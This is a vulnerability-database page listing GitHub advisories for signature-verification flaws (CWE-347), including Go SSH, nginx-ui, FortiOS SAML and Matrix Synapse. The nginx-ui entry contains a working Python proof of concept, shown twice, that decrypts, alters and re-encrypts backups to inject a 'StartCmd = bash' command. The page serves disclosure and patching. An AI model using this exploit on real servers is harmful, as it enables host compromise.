CWE-347
AllowedImproper Verification of Cryptographic Signature
Abstraction: Base · Status: Draft
The product does not verify, or incorrectly verifies, the cryptographic signature for data.
1127 vulnerabilities reference this CWE, most recent first.
GHSA-FFHG-7MH4-33C4
Vulnerability from github – Published: 2021-05-18 15:29 – Updated: 2023-02-16 00:14golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "golang.org/x/crypto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20200220183623-bac4c82f6975"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-9283"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-17T22:02:30Z",
"nvd_published_at": "2020-02-20T20:15:00Z",
"severity": "HIGH"
},
"details": "golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.",
"id": "GHSA-ffhg-7mh4-33c4",
"modified": "2023-02-16T00:14:18Z",
"published": "2021-05-18T15:29:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9283"
},
{
"type": "WEB",
"url": "https://github.com/golang/crypto/commit/bac4c82f69751a6dd76e702d54b3ceb88adab236"
},
{
"type": "PACKAGE",
"url": "https://github.com/golang/crypto"
},
{
"type": "WEB",
"url": "https://go.dev/cl/220357"
},
{
"type": "WEB",
"url": "https://go.googlesource.com/crypto/+/bac4c82f69751a6dd76e702d54b3ceb88adab236"
},
{
"type": "WEB",
"url": "https://groups.google.com/forum/#!topic/golang-announce/3L45YRc91SY"
},
{
"type": "WEB",
"url": "https://groups.google.com/g/golang-announce/c/3L45YRc91SY"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/10/msg00014.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00027.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00031.html"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2020-0012"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/48121"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/156480/Go-SSH-0.0.2-Denial-Of-Service.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Improper Verification of Cryptographic Signature in golang.org/x/crypto"
}
GHSA-FHH2-GG7W-GWPQ
Vulnerability from github – Published: 2026-03-30 16:23 – Updated: 2026-07-06 19:35Summary
The nginx-ui backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.
Details
The backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (hash_info.txt) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.
Because the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.
The backup system is built around the following workflow:
- Backup files are compressed into
nginx-ui.zipandnginx.zip. - The files are encrypted using AES-256-CBC.
- SHA-256 hashes of the encrypted files are stored in
hash_info.txt. - The hash file is also encrypted with the same AES key and IV.
- The AES key and IV are provided to the client as a "backup security token".
This architecture creates a circular trust model:
- The encryption key is available to the client.
- The integrity metadata is encrypted with that same key.
- The restore process trusts hashes contained within the backup itself.
Because the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.
Environment
- OS: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)
- Application Version: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)
- Deployment: Docker Container default installation
- Relevant Source Files:
backup_crypto.gobackup.gorestore.goSystemRestoreContent.vue
PoC
-
Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the
.keyfile. -
Decrypt the
nginx-ui.ziparchive using the obtained token.
import base64
import os
import sys
import zipfile
from io import BytesIO
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
def decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -> bytes:
key = base64.b64decode(key_b64)
iv = base64.b64decode(iv_b64)
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(encrypted_data)
return unpad(decrypted, AES.block_size)
def process_local_backup(file_path, token, output_dir):
key_b64, iv_b64 = token.split(":")
os.makedirs(output_dir, exist_ok=True)
print(f"[*] File processing: {file_path}")
with zipfile.ZipFile(file_path, 'r') as main_zip:
main_zip.extractall(output_dir)
files_to_decrypt = ["hash_info.txt", "nginx-ui.zip", "nginx.zip"]
for filename in files_to_decrypt:
path = os.path.join(output_dir, filename)
if os.path.exists(path):
with open(path, "rb") as f:
encrypted = f.read()
decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)
out_path = path + ".decrypted"
with open(out_path, "wb") as f:
f.write(decrypted)
print(f"[*] Successfully decrypted: {out_path}")
# Manual config
BACKUP_FILE = "backup-20260314-151959.zip"
TOKEN = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
OUTPUT = "decrypted"
if __name__ == "__main__":
process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)
- Modify the contained
app.inito inject malicious configuration (e.g.,StartCmd = bash). - Re-compress the files and calculate the new SHA-256 hash.
- Update
hash_info.txtwith the new, legitimate-looking hashes for the modified files. - Encrypt the bundle again using the original Key and IV.
import base64
import hashlib
import os
import zipfile
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
def encrypt_file(data, key_b64, iv_b64):
key = base64.b64decode(key_b64)
iv = base64.b64decode(iv_b64)
cipher = AES.new(key, AES.MODE_CBC, iv)
return cipher.encrypt(pad(data, AES.block_size))
def build_rebuilt_backup(files, token, output_filename="backup_rebuild.zip"):
key_b64, iv_b64 = token.split(":")
encrypted_blobs = {}
for fname in files:
with open(fname, "rb") as f:
data = f.read()
blob = encrypt_file(data, key_b64, iv_b64)
target_name = fname.replace(".decrypted", "")
encrypted_blobs[target_name] = blob
print(f"[*] Cipher {target_name}: {len(blob)} bytes")
hash_content = ""
for name, blob in encrypted_blobs.items():
h = hashlib.sha256(blob).hexdigest()
hash_content += f"{name}: {h}\n"
encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)
encrypted_blobs["hash_info.txt"] = encrypted_hash_info
with zipfile.ZipFile(output_filename, 'w', compression=zipfile.ZIP_DEFLATED) as zf:
for name, blob in encrypted_blobs.items():
zf.writestr(name, blob)
print(f"\n[*] Backup rebuild: {output_filename}")
print(f"[*] Verificando integridad...")
TOKEN = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
FILES = ["nginx-ui.zip.decrypted", "nginx.zip.decrypted"]
if __name__ == "__main__":
build_rebuilt_backup(FILES, TOKEN)
-
Upload the tampered backup to the
nginx-uirestore interface. -
Observation: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.
Impact
An attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.
Potential impacts include:
- Persistent configuration tampering
- Backdoor insertion into nginx configuration
- Execution of attacker-controlled commands depending on configuration settings
- Full compromise of the nginx-ui instance
The severity depends on the restore permissions and deployment configuration.
Recommended Mitigation
- Introduce a trusted integrity root Integrity metadata must not be derived solely from data contained in the backup. Possible solutions include:
- Signing backup metadata using a server-side private key
-
Storing integrity metadata separately from the backup archive
-
Enforce integrity verification The restore operation must abort if hash verification fails.
-
Avoid circular trust models If encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.
-
Optional cryptographic improvements While not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.
This vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.
Regression
The previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.
The backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.
As a result, the fundamental integrity weakness remains exploitable even after the previous fix.
A patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/0xJacky/Nginx-UI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.10-0.20260315015203-f61bcec547c0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33026"
],
"database_specific": {
"cwe_ids": [
"CWE-312",
"CWE-347",
"CWE-354"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-30T16:23:34Z",
"nvd_published_at": "2026-03-30T20:16:22Z",
"severity": "CRITICAL"
},
"details": "## Summary\nThe `nginx-ui` backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.\n\n## Details\nThe backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (`hash_info.txt`) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.\n\nBecause the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.\n\nThe backup system is built around the following workflow:\n\n1. Backup files are compressed into `nginx-ui.zip` and `nginx.zip`.\n2. The files are encrypted using AES-256-CBC.\n3. SHA-256 hashes of the encrypted files are stored in `hash_info.txt`.\n4. The hash file is also encrypted with the same AES key and IV.\n5. The AES key and IV are provided to the client as a \"backup security token\".\n\nThis architecture creates a circular trust model:\n\n- The encryption key is available to the client.\n- The integrity metadata is encrypted with that same key.\n- The restore process trusts hashes contained within the backup itself.\n\nBecause the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.\n\n### Environment\n- **OS**: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- **Application Version**: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)\n- **Deployment**: Docker Container default installation\n- **Relevant Source Files**:\n - `backup_crypto.go`\n - `backup.go`\n - `restore.go`\n - `SystemRestoreContent.vue`\n\n\n## PoC\n1. Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the `.key` file.\n \u003cimg width=\"1483\" height=\"586\" alt=\"image\" src=\"https://github.com/user-attachments/assets/857a1b3f-ce66-4929-a165-2f28393df17f\" /\u003e\n\n2. Decrypt the `nginx-ui.zip` archive using the obtained token.\n``` \nimport base64\nimport os\nimport sys\nimport zipfile\nfrom io import BytesIO\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\n\ndef decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -\u003e bytes:\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n \n cipher = AES.new(key, AES.MODE_CBC, iv)\n decrypted = cipher.decrypt(encrypted_data)\n return unpad(decrypted, AES.block_size)\n\ndef process_local_backup(file_path, token, output_dir):\n key_b64, iv_b64 = token.split(\":\")\n os.makedirs(output_dir, exist_ok=True)\n print(f\"[*] File processing: {file_path}\")\n \n with zipfile.ZipFile(file_path, \u0027r\u0027) as main_zip:\n main_zip.extractall(output_dir)\n \n files_to_decrypt = [\"hash_info.txt\", \"nginx-ui.zip\", \"nginx.zip\"]\n \n for filename in files_to_decrypt:\n path = os.path.join(output_dir, filename)\n if os.path.exists(path):\n with open(path, \"rb\") as f:\n encrypted = f.read()\n \n decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)\n \n out_path = path + \".decrypted\"\n with open(out_path, \"wb\") as f:\n f.write(decrypted)\n print(f\"[*] Successfully decrypted: {out_path}\")\n\n# Manual config\nBACKUP_FILE = \"backup-20260314-151959.zip\" \nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nOUTPUT = \"decrypted\"\n\nif __name__ == \"__main__\":\n process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)\n```\n\n3. Modify the contained `app.ini` to inject malicious configuration (e.g., `StartCmd = bash`).\n4. Re-compress the files and calculate the new SHA-256 hash.\n5. Update `hash_info.txt` with the new, legitimate-looking hashes for the modified files.\n6. Encrypt the bundle again using the original Key and IV.\n```\nimport base64\nimport hashlib\nimport os\nimport zipfile\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\n\ndef encrypt_file(data, key_b64, iv_b64):\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n cipher = AES.new(key, AES.MODE_CBC, iv)\n return cipher.encrypt(pad(data, AES.block_size))\n\ndef build_rebuilt_backup(files, token, output_filename=\"backup_rebuild.zip\"):\n key_b64, iv_b64 = token.split(\":\")\n \n encrypted_blobs = {}\n for fname in files:\n with open(fname, \"rb\") as f:\n data = f.read()\n \n blob = encrypt_file(data, key_b64, iv_b64)\n\n target_name = fname.replace(\".decrypted\", \"\")\n encrypted_blobs[target_name] = blob\n print(f\"[*] Cipher {target_name}: {len(blob)} bytes\")\n\n hash_content = \"\"\n for name, blob in encrypted_blobs.items():\n h = hashlib.sha256(blob).hexdigest()\n hash_content += f\"{name}: {h}\\n\"\n \n encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)\n encrypted_blobs[\"hash_info.txt\"] = encrypted_hash_info\n\n with zipfile.ZipFile(output_filename, \u0027w\u0027, compression=zipfile.ZIP_DEFLATED) as zf:\n for name, blob in encrypted_blobs.items():\n zf.writestr(name, blob)\n \n print(f\"\\n[*] Backup rebuild: {output_filename}\")\n print(f\"[*] Verificando integridad...\")\n\nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nFILES = [\"nginx-ui.zip.decrypted\", \"nginx.zip.decrypted\"]\n\nif __name__ == \"__main__\":\n build_rebuilt_backup(FILES, TOKEN)\n```\n7. Upload the tampered backup to the `nginx-ui` restore interface.\n \u003cimg width=\"1059\" height=\"290\" alt=\"image\" src=\"https://github.com/user-attachments/assets/66872685-b85b-4c81-ae24-13c811acba9a\" /\u003e\n\n\n8. **Observation**: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.\n \u003cimg width=\"1316\" height=\"627\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2752749e-ac39-4d60-88ca-5058b8e840a6\" /\u003e\n\n\n\n## Impact\nAn attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.\n\nPotential impacts include:\n\n- Persistent configuration tampering\n- Backdoor insertion into nginx configuration\n- Execution of attacker-controlled commands depending on configuration settings\n- Full compromise of the nginx-ui instance\n\nThe severity depends on the restore permissions and deployment configuration.\n\n## Recommended Mitigation\n\n1. **Introduce a trusted integrity root**\nIntegrity metadata must not be derived solely from data contained in the backup. Possible solutions include:\n - Signing backup metadata using a server-side private key\n - Storing integrity metadata separately from the backup archive\n\n2. **Enforce integrity verification**\nThe restore operation must abort if hash verification fails.\n\n3. **Avoid circular trust models**\nIf encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.\n\n4. **Optional cryptographic improvements**\nWhile not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.\n\nThis vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.\n\n## Regression\n\nThe previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.\n\nThe backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.\n\nAs a result, the fundamental integrity weakness remains exploitable even after the previous fix.\n\nA patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.",
"id": "GHSA-fhh2-gg7w-gwpq",
"modified": "2026-07-06T19:35:49Z",
"published": "2026-03-30T16:23:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-fhh2-gg7w-gwpq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33026"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/commit/f61bcec547c0f305e35348d6440ef156c1d5c3cb"
},
{
"type": "PACKAGE",
"url": "https://github.com/0xJacky/nginx-ui"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-g9w5-qffc-6762"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2026-4903"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "nginx-ui Backup Restore Allows Tampering with Encrypted Backups"
}
GHSA-FHVH-VW7H-9XF3
Vulnerability from github – Published: 2026-05-19 16:18 – Updated: 2026-05-19 16:18The AVX2 implementation of ML-DSA verification incorrectly implemented
the use_hint function, mishandling an edge case that should lead to
signature rejection.
Impact
An attacker could make the ML-DSA verifier accept a crafted invalid signature under a maliciously generated verification key, if the AVX2 implementation is used.
Mitigation
From version 0.0.9 the edge case is handled correctly and invalid
signatures are rejected.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "libcrux-ml-dsa"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T16:18:53Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The AVX2 implementation of ML-DSA verification incorrectly implemented\nthe `use_hint` function, mishandling an edge case that should lead to\nsignature rejection.\n\n## Impact\nAn attacker could make the ML-DSA verifier accept a crafted invalid\nsignature under a maliciously generated verification key, if the AVX2\nimplementation is used.\n\n## Mitigation\nFrom version `0.0.9` the edge case is handled correctly and invalid\nsignatures are rejected.",
"id": "GHSA-fhvh-vw7h-9xf3",
"modified": "2026-05-19T16:18:53Z",
"published": "2026-05-19T16:18:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/C2SP/wycheproof/pull/234"
},
{
"type": "WEB",
"url": "https://github.com/cryspen/libcrux/pull/1398"
},
{
"type": "WEB",
"url": "https://github.com/tink-crypto/tink-go/pull/48"
},
{
"type": "PACKAGE",
"url": "https://github.com/cryspen/libcrux"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2026-0125.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": " libcrux-ml-dsa: Signature Verification on AVX2 Platforms Mishandles Edge Case"
}
GHSA-FJJ2-P33C-F8QQ
Vulnerability from github – Published: 2025-12-09 18:30 – Updated: 2026-06-09 12:31A improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0.0 through 7.0.21, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
{
"affected": [],
"aliases": [
"CVE-2025-59718"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-09T18:15:54Z",
"severity": "CRITICAL"
},
"details": "A improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0.0 through 7.0.21, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.",
"id": "GHSA-fjj2-p33c-f8qq",
"modified": "2026-06-09T12:31:59Z",
"published": "2025-12-09T18:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59718"
},
{
"type": "WEB",
"url": "https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-864900.html"
},
{
"type": "WEB",
"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-647"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-59718"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FMJ7-7GFW-64PG
Vulnerability from github – Published: 2024-10-15 17:33 – Updated: 2024-10-15 23:36Certificate verification (in lib/agent/certificate.dart) has been found to contain two issues: - During the delegation verification (in _checkDelegation function) the canister_ranges aren't verified. The impact of not checking the canister_ranges is that a subnet can sign canister responses in behalf of another subnet. You have more details in the IC specification here. Also for reference you can check how is this implemented in the agent-rs. - The certificate’s timestamp, i.e /time path, is not verified, meaning that the certificate effectively has no expiration time. The IC spec doesn’t specify an expiry times, it gives some suggestions, quoting: "A reasonable expiry time for timestamps in R.signatures and the certificate Cert is 5 minutes (analogously to the maximum allowed ingress expiry enforced by the IC mainnet). Delegations require expiry times of at least a week since the IC mainnet refreshes the delegations only after replica upgrades which typically happen once a week". For reference you can check how is this implemented in the agent-rs (here and here).
Additionally, seems replica signed queries aren’t implemented
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.0.0-dev.28"
},
"package": {
"ecosystem": "Pub",
"name": "agent_dart"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.0-dev.29"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-48915"
],
"database_specific": {
"cwe_ids": [
"CWE-295",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-15T17:33:50Z",
"nvd_published_at": "2024-10-15T17:15:11Z",
"severity": "HIGH"
},
"details": "Certificate verification (in [lib/agent/certificate.dart](https://github.com/AstroxNetwork/agent_dart/blob/main/lib/agent/certificate.dart)) has been found to contain two issues:\n - During the delegation verification (in [_checkDelegation](https://github.com/AstroxNetwork/agent_dart/blob/f50971dfae3f536c1720f0084f28afbcf5d99cb5/lib/agent/certificate.dart#L162) function) the canister_ranges aren\u0027t verified. The impact of not checking the canister_ranges is that a subnet can sign canister responses in behalf of another subnet. You have more details in the IC specification [here](https://internetcomputer.org/docs/current/references/ic-interface-spec#certification-delegation). Also for reference you can check how is this implemented in [the agent-rs](https://github.com/dfinity/agent-rs/blob/608a3f4cfdcdfc5ca1ca74a1b9d33f2137a2d324/ic-agent/src/agent/mod.rs#L903-L914).\n - The certificate\u2019s timestamp, i.e /time path, is not verified, meaning that the certificate effectively has no expiration time. The [IC spec](https://internetcomputer.org/docs/current/references/ic-interface-spec#http-query) doesn\u2019t specify an expiry times, it gives some suggestions, quoting: \"A reasonable expiry time for timestamps in R.signatures and the certificate Cert is 5 minutes (analogously to the maximum allowed ingress expiry enforced by the IC mainnet). Delegations require expiry times of at least a week since the IC mainnet refreshes the delegations only after replica upgrades which typically happen once a week\". For reference you can check how is this implemented in the agent-rs ([here](https://github.com/dfinity/agent-rs/blob/608a3f4cfdcdfc5ca1ca74a1b9d33f2137a2d324/ic-agent/src/agent/mod.rs#L820) and [here](https://github.com/dfinity/agent-rs/blob/608a3f4cfdcdfc5ca1ca74a1b9d33f2137a2d324/ic-agent/src/agent/mod.rs#L876-L887)).\n\n**Additionally**, seems [replica signed queries](https://internetcomputer.org/blog/features/replica-signed-queries) aren\u2019t implemented",
"id": "GHSA-fmj7-7gfw-64pg",
"modified": "2024-10-15T23:36:57Z",
"published": "2024-10-15T17:33:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/AstroxNetwork/agent_dart/security/advisories/GHSA-fmj7-7gfw-64pg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48915"
},
{
"type": "WEB",
"url": "https://github.com/AstroxNetwork/agent_dart/commit/0d200686aabcd9313c7bc3e675cbdc82f6b775cf"
},
{
"type": "PACKAGE",
"url": "https://github.com/AstroxNetwork/agent_dart"
},
{
"type": "WEB",
"url": "https://github.com/AstroxNetwork/agent_dart/blob/f50971dfae3f536c1720f0084f28afbcf5d99cb5/lib/agent/certificate.dart#L162"
},
{
"type": "WEB",
"url": "https://github.com/AstroxNetwork/agent_dart/blob/main/lib/agent/certificate.dart"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Agent Dart is missing certificate verification checks"
}
GHSA-FMP2-HP5C-W25P
Vulnerability from github – Published: 2026-07-13 12:35 – Updated: 2026-07-13 12:35The firmware update mechanism does not include cryptographic signature validation. This allows anyone with access to the firmware update capability to upload arbitrary files which can then lead to arbitrary code execution.
{
"affected": [],
"aliases": [
"CVE-2026-22097"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-13T10:16:27Z",
"severity": "CRITICAL"
},
"details": "The firmware update mechanism does not include cryptographic signature validation. This allows anyone with access to the firmware update capability to upload arbitrary files which can then lead to arbitrary code execution.",
"id": "GHSA-fmp2-hp5c-w25p",
"modified": "2026-07-13T12:35:00Z",
"published": "2026-07-13T12:35:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22097"
},
{
"type": "WEB",
"url": "https://csirt.divd.nl/DIVD-2026-00001"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FMVH-RVQ5-HHJX
Vulnerability from github – Published: 2022-05-13 01:50 – Updated: 2023-10-06 17:19Matrix Synapse before 0.33.3.1 and 0.33.2.1 allows remote attackers to spoof events and possibly have unspecified other impacts by leveraging improper transaction and event signature validation.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "matrix-synapse"
},
"ranges": [
{
"events": [
{
"introduced": "0.33.3"
},
{
"fixed": "0.33.3.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "matrix-synapse"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.33.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2018-16515"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-24T20:04:34Z",
"nvd_published_at": "2018-09-18T21:29:00Z",
"severity": "HIGH"
},
"details": "Matrix Synapse before 0.33.3.1 and 0.33.2.1 allows remote attackers to spoof events and possibly have unspecified other impacts by leveraging improper transaction and event signature validation.",
"id": "GHSA-fmvh-rvq5-hhjx",
"modified": "2023-10-06T17:19:32Z",
"published": "2022-05-13T01:50:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16515"
},
{
"type": "WEB",
"url": "https://github.com/matrix-org/synapse/issues/3796#event-1833126269"
},
{
"type": "WEB",
"url": "https://github.com/matrix-org/synapse/commit/5bf8bc79ebc22c61968f2eb487714813fccbdb9b"
},
{
"type": "WEB",
"url": "https://github.com/matrix-org/synapse/commit/804dd41e18c449e711e443398b95c9f6c68b6fa2"
},
{
"type": "WEB",
"url": "https://github.com/matrix-org/synapse/commit/a5a0bf5cf71caed3c4e3677d2bce667c147dadfc"
},
{
"type": "WEB",
"url": "https://github.com/matrix-org/synapse/commit/c127c8d0421f0228a46ebbe280c9537e8d8ea42b"
},
{
"type": "PACKAGE",
"url": "https://github.com/matrix-org/synapse"
